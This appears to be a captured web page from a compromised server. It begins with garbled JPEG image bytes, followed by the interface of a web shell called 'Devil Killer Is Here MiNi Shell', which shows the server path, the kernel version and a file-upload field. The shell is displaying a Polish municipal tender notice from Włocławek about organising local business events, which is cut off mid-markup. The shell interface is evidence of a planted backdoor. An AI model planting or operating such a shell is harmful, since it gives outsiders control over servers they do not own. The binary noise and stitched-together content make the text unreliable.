JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230504/0020197901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Organizacja, promocja oraz przeprowadzenie 10 dwudniowych wydarzeń skierowanych do lokalnych przedsiębiorców” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO WŁOCŁAWEK - Urząd Miasta Włocławek</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866910</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zielony Rynek 11/13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włocławek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 (54) 414 40 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 (54) 414 42 57</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@um.wloclawek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wloclawek.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Organizacja, promocja oraz przeprowadzenie 10 dwudniowych wydarzeń skierowanych do lokalnych przedsiębiorców” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9ffa83bd-ea58-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00201979</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00060399/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Organizacja tzw. Zielonego Festiwalu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umwloclawek.logintrade.net/zapytania_email,127132,210a2fe1697306b81af250dcecc449f9.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W prowadzonym postępowaniu komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. W prowadzonym postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy<br/>Przetargowej Urzędu Miasta Włocławek, dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html oraz<br/>za pomocą poczty elektronicznej, z zastrzeżeniem pkt. 3.<br/>3. Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest jego prawidłowe złożenie na Platformie<br/>Przetargowej Urzędu Miasta Włocławek dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html, w<br/>wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem.<br/>4. Korespondencję związaną z prowadzonym postępowaniem można również kierować na następujący adres poczty elektronicznej<br/>Zamawiającego: zamowienia@um.wloclawek.pl, z zastrzeżeniem pkt. 3.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korzystanie z Platformy<br/>Przetargowej Urzędu Miasta Włocławek przez Wykonawcę jest bezpłatne.<br/>2. Instrukcja korzystania z Platformy Przetargowej Urzędu Miasta Włocławek dostępna jest pod adresem:<br/>https://umwloclawek.logintrade.net/rejestracja/instrukcje.html.<br/>3. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat<br/>SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej<br/>Urzędu Miasta Włocławek ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na<br/>zadawanie pytań do treści SWZ oraz<br/>komunikację z Zamawiającym w pozostałych obszarach.<br/>4. Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy użyciu Platformy Przetargowej Urzędu<br/>Miasta Włocławek:<br/>1) dopuszczalne przeglądarki internetowe:<br/>a) Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>b) Google Chrome 31,<br/>c) Mozilla Firefox 26,<br/>d) Opera 18;<br/>2) pozostałe wymagania techniczne:<br/>a) dostęp do sieci Internet,<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax,<br/>c) włączona obsługa JavaScript,<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s,<br/>e) zainstalowany Acrobat Reader,<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy;<br/>3) wspierane są rozwiązania dostarczane przez firmy:<br/>a) Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.,<br/>b) Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.,<br/>c) Powszechne Centrum Certyfikacji Certum firmy Unizeto Technologies S.A.,<br/>d) Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.;<br/>4) dopuszczalne formaty przesyłanych danych: Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji<br/>elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na podstawie § 2 ust. 1 i 2 rozporządzenia<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452 ze zm.). Równocześnie Zamawiający rekomenduje na format danych<br/>przesyłanych plików: *.pdf.<br/>5) maksymalny rozmiar pojedynczego pliku: 150 MB, przy czym nie określa się limitu liczby plików.<br/>5. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej. Adres poczty elektronicznej<br/>Zamawiającego to: zamowienia@um.wloclawek.pl.<br/>6. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>7. Zamawiający zaleca, aby nazwa plików lub katalogów przesyłanych Zamawiającemu przy użyciu Platformy Przetargowej Urzędu<br/>Miasta Włocławek, dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html, oraz za pomocą poczty<br/>elektronicznej zawierała maksymalnie 50 znaków.<br/>8. W przypadku niezastosowania się przez Wykonawcę do zalecenia Zamawiającego, o którym mowa w pkt. 7, Wykonawca<br/>przyjmuje na siebie wyłączne ryzyko braku możliwości otwarcia przez Zamawiającego przesłanego pliku lub katalogu, a tym samym<br/>ryzyko braku możliwości zapoznania się przez Zamawiającego treścią przesłanego pliku lub katalogu.<br/>9. Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowi usługa, polegająca na organizacji, promocji oraz przeprowadzeniu 10 dwudniowych wydarzeń skierowanych do lokalnych przedsiębiorców w ramach zadania o nazwie „Zielony Festiwal”, realizowanego w zakresie projektu o nazwie ,,WŁOCŁAWEK – MIASTO NOWYCH MOŻLIWOŚCI”. Tutaj mieszkam, pracuję, inwestuję i tu wypoczywam”, finansowanego w ramach Programu Rozwój Lokalny ze środ-ków Mechanizmu Finansowego EOG oraz budżetu państwa.<br/><br/>W zakres przedmiotu zamówienia wchodzi: <br/><br/>1.	Organizacja oraz przeprowadzenie przez Wykonawcę 10 dwudniowych wydarzeń <br/>w układzie sobota-niedziela, skierowanych do lokalnych przedsiębiorców, w których w ramach całego zamówienia powinno wziąć udział minimum 490 lokalnych przedsiębiorców.<br/>2.	Zamawiający ustala minimalną liczbę 49 lokalnych przedsiębiorców uczestniczących podczas każdego z dwudniowych wydarzeń. Zamawiający dopuszcza udział tego samego przedsiębiorcy w każdym z wydarzeń.<br/>3.	Wykonawca jest obowiązany zrealizować 10 dwudniowych wydarzeń w układzie sobota-niedziela w okresie nie dłuższym niż 6 miesięcy od dnia zawarcia umowy, z czego co najmniej 5 wydarzeń w odstępach minimum 2 tygodniowych z zastrzeżeniem, że ostatnie z 10 dwudniowych wydarzeń odbędzie się najpóźniej w sobotę i niedzielę przełomu miesiąca września i października 2023 r., tj. 30.09.2023 r.-01.10.2023 r.<br/><br/>4.	Wykonawca przygotuje i przedstawi osobiście lub w formie elektronicznej (e-mail) Zamawiającemu w terminie nie dłuższym niż 7 dni kalendarzowych od dnia zawarcia umowy szczegółowy harmonogram i scenariusz wszystkich organizowanych 10 dwudniowych wydarzeń. Zamawiający zgłosi Wykonawcy ewentualne uwagi do przedłożonego scenariusza oraz szczegółowego harmonogramu w terminie nie dłuższym niż 3 dni kalendarzowe od dnia dostarczenia szczegółowego harmonogramu oraz scenariusza.<br/>5.	Scenariusz powinien określać co najmniej przygotowanie przewidywanego przebiegu imprezy w formie szczegółowego programu, ze wskazaniem ram czasowych na jego poszczególne elementy. Zamawiający przekaże Wykonawcy wytyczne do przygotowania imprezy określone w Załączniku nr 3 do SWZ. Załącznik określał będzie program wydarzeń, lokalizację, a także zasady rekrutacji przedsiębiorców.<br/>6.	Zamawiający ustala następujące godziny przeprowadzenia wydarzeń: <br/> sobota-niedziela: w godzinach 12:00 – 18.00 w każdym dniu wydarzenia.<br/>7.	Wykonawca Zapewni osobę pełniącą funkcję konferansjera.<br/>8.	Zadaniami konferansjera podczas każdego z wydarzeń będzie w szczególności:<br/>- pomoc uczestnikom wydarzeń odpowiednio nastawić się do mających nastąpić wydarzeń/atrakcji <br/>i ułatwić im zjawienie się w odpowiednim miejscu i czasie; <br/>- opowiadanie anegdot czy krótkich historii, które ubarwią całość wydarzenia i staną się dopełnieniem przeżyć uczestników;<br/>- dbanie o odpowiednią dynamikę wydarzeń, o to co się dzieje w przerwach, jakie emocje przebijają się na pierwszy plan i jaka atmosfera przebiega podczas całego wydarzenia;<br/>- moderowanie rozmów toczących się na scenie, zadawanie pytań, podsumowania, parafrazowanie wy-powiedzi.<br/>9.	Zamawiający użyczy Wykonawcy sprzętu niezbędnego do przeprowadzenia wydarzeń. Wykonawca na wypadek wystąpienia podczas któregokolwiek z wydarzeń awarii lub usterki sprzętu użyczonego przez Zamawiającego, zobowiązany będzie do zapewnienia sprzętu zastępczego o parametrach nie gorszych niż sprzęt, który został mu użyczony przez Zamawiającego.<br/>10.	Wykonawca zobowiązuje się zapewnić podczas każdego z wydarzeń organizację innych atrakcji adresowanych do odbiorców spośród wszystkich grup wiekowych, umożliwiających czynny udział w nich mieszkańców i gości - typu konkursy, zawody, zajęcia animacyjne dla dzieci, dmuchane place zabaw, itp. Szczegółowe wytyczne dotyczące organizowanych atrakcji Zamawiający określi w Załączniku nr 3 do SWZ. <br/>11.	Zamawiający ustala, że każde z 10 dwudniowych wydarzeń ma mieć charakter ogólnodostępny, o charakterze otwartym dla wszystkich zainteresowanych <br/>i odwiedzających.<br/>12. Wykonawca zobowiązuje się zabezpieczyć każde z dwudniowych wydarzeń <br/>w zakresie zapewnienia od strony medycznej:<br/>•	zorganizowany, wydzielony oraz odpowiednio i czytelnie oznakowany punkt medyczny - zapewnienie odpowiedniej infrastruktury (np. namioty, tablice informacyjne, wyposażenie);<br/>•	zabezpieczenie medyczne w postaci ratownika medycznego bądź osoby posiadającej ukończony kurs kwalifikowanej pierwszej pomocy;<br/>•	zabezpieczenie od strony medycznej zapewnione ma być w godzinach trwania wydarzenia tj. przez 6 godzin każdego dnia w którym odbywać się będzie wydarzenie;<br/>•	zabezpieczenie w zakresie wymagań ochrony przeciwpożarowej.<br/>13.	Wykonawca zobowiązuje się zabezpieczyć każde z dwudniowych wydarzeń <br/>w zakresie zapewnienia: <br/>•	toalet przenośnych w ilości 10 sztuk, w tym 1 toaleta dostosowana do wymagań dla osób niepełnosprawnych oraz 1 umywalka wolnostojąca;<br/>•	serwisowanie toalet polegające na: opróżnianiu zbiornika na fekalia, uzupełnianiu papieru toaletowego, myciu kabin z zewnątrz i wewnątrz, dezynfekcji toalet z zewnątrz i wewnątrz, dodawaniu zapachu, dokonywania przeglądu technicznego toalet;<br/>•	utrzymywania bieżącej czystości podczas trwania wydarzenia, w tym zapewnienie min. <br/>2 osób odpowiedzialnych za zbieranie odpadów w miejscu przeprowadzenia wydarzenia;<br/>•	zapewnieniu min. 10 pojemników na odpady zmieszane o pojemności min. 110 litrów oraz 1 pojemnika na odpady zmieszane o pojemności min. 1100 litrów. Wykonawca zobowiązany jest zapewnić opróżnianie koszy po każdym dniu wydarzenia;<br/>•	Wykonawca zobowiązany jest na co najmniej 2 dni przed rozpoczęciem każdego <br/>z wydarzeń, przedłożyć Zamawiającemu umowę z podmiotem świadczącym usługi <br/>w zakresie wywozu nieczystości płynnych i odpadów komunalnych.<br/>14.	Wykonawca zapewni obsługę podczas każdego z dwudniowych wydarzeń w ilości od 4 do 8 osób niezbędnych do prawidłowego ich przebiegu. Zakres czynności osób <br/>o których mowa powyżej będzie dotyczyła prac związanych przed i po wydarzeniu <br/>z montażem i demontażem namiotów, montażem i demontażem barierek ochronnych przy scenie, oraz wszelkich prac związanych z organizacją wydarzenia.<br/>15.	Zapewnienie zgodnie z zapisami ustawy z dnia 22 sierpnia 1997r. o ochronie osób <br/>i mienia (Dz.U. z 2021 r. poz. 1995 z późn. zm.) kwalifikowanych pracowników ochrony fizycznej dla każdego z wydarzeń w ilości minimum 5 ochroniarzy. Do obowiązków pracowników ochrony będzie należało: ochrona sceny przed wejściem osób nieuprawnionych, patrolowanie terenu imprezy, w szczególności punktów wystawowych oraz miejsca przeznaczonego do zabaw dla dzieci.<br/>16.	Wykonawca zobowiązany jest do posiadania ubezpieczenia OC obejmującego zakresem ochrony odpowiedzialność organizatora imprez z sumą gwarancyjną <br/>w wysokości, co najmniej 100.000,00 zł. Ubezpieczenie OC powinno obejmować odpowiedzialność za szkody wyrządzone czynem niedozwolonym lub wynikłe <br/>z niewykonania lub nienależytego wykonania zobowiązania. Dodatkowo ubezpieczenie OC powinno obejmować: <br/>- szkody wyrządzone uczestnikowi Imprezy podczas jej trwania, polegające na uszkodzeniu ciała, wywołaniu rozstroju zdrowia (w szczególności za szkody wynikające <br/>z zatruć pokarmowych) czy też uszkodzeniu, zniszczeniu lub utracie mienia. <br/>- szkody w rzeczach ruchomych osób trzecich, z których Wykonawcy korzystali na podstawie umowy najmu, dzierżawy, leasingu, użyczenia lub innego pokrewnego stosunku prawnego. <br/>W wypadku korzystania przez Wykonawcę z podwykonawców, polisa OC Wykonawcy powinna obejmować swym zakresem szkody wyrządzone przez podwykonawców. <br/>W stosunku do wyżej wymienionych szkód oraz ryzyk nie dopuszcza się stosowania podlimitów odpowiedzialności niższych niż minimalna wymagana suma gwarancyjna. <br/>2. Ubezpieczona działalność Wykonawcy musi być tożsama z przedmiotem działalności niezbędnej do wykonywania zamówienia (przedmiotem i zakresem zamówienia). Ochrona ubezpieczeniowa powinna obejmować ryzyka związane z realizacją zamówienia. <br/>3. Polisa ubezpieczenia OC, o której mowa powyżej, w tym także polisa/polisy podwykonawców, powinny zostać przedstawione Zamawiającemu do zatwierdzenia nie później niż na 7 dni przed dniem, rozpoczęcia każdego z wydarzeń. Dokumenty ubezpieczenia będą podlegały weryfikacji Zamawiającego. Wykonawca zobowiązany jest przesłać w wyznaczonych terminach dokumenty ubezpieczenia oraz dowody zapłaty składki/rat składki na adres: Urząd Miasta Włocławek, Centrum Obsługi Inwestora, Zielony Rynek 11/13, 87-800 Włocławek.<br/>17.	Sprawozdawczość dotycząca realizacji wydarzeń:<br/>a)	sporządzanie raportu merytorycznego dotyczącego realizacji każdego z 10 dwudniowych wydarzeń (m.in. informacji dotyczących organizacji ogólnych działań <br/>w ramach wydarzeń oraz ilość uczestniczących przedsiębiorców); <br/>b) dokumentacja fotograficzna każdego z 10 dwudniowych wydarzeń w ilości minimum 10 zdjęć dokumentujących m.in przebieg wydarzeń określonych w scenariuszu;<br/>c)	dokumentacja dotycząca działań promocyjnych (załączenie materiałów promocyjnych);<br/>d)	dostarczenie raportu merytorycznego oraz dokumentacji fotograficznej w terminie nie dłuższym niż 7 dni kalendarzowych od dnia zakończenia wydarzenia, którego raport <br/>dotyczy, do wykorzystania na potrzeby Urzędu Miasta Włocławek (m.in. stronę internetową, portale społecznościowe). Przekazanie przez Wykonawcę przedmiotowej dokumentacji fotograficznej będzie wiązało się z przeniesieniem praw autorskich do niej na rzecz Zamawiającego na wszystkich polach eksploatacji.<br/>18.	Zobowiązania Zamawiającego: <br/>a)	udostępnienie terenu w dniach organizacji każdego z 10 dwudniowych wydarzeń, określonego w Załączniku nr 3 do SWZ;<br/>b)	zezwolenie na wjazd oznakowanych samochodów dostawczych na teren każdego <br/>z wydarzeń na czas niezbędny do rozładunku towaru – dotyczy pojazdów, które przekraczają DMC na ulicach dojazdowych;<br/>c)	zapewnienie sprzętu niezbędnego do realizacji każdego z wydarzeń tj. scena, sprzęt nagłaśniający, barierki, stoły promocyjne, krzesła, konsoleta mikserska, nagłośnienie, mikrofony, statywy, odbiornik. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79952000-2 - Usługi w zakresie organizacji imprez</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79342200-5 - Usługi w zakresie promocji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość pojemników na odpady zmieszane o poj. min. 110 litrów na każdym z wydarzeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe atrakcje na każdym z wydarzeń</span></h3> <h3 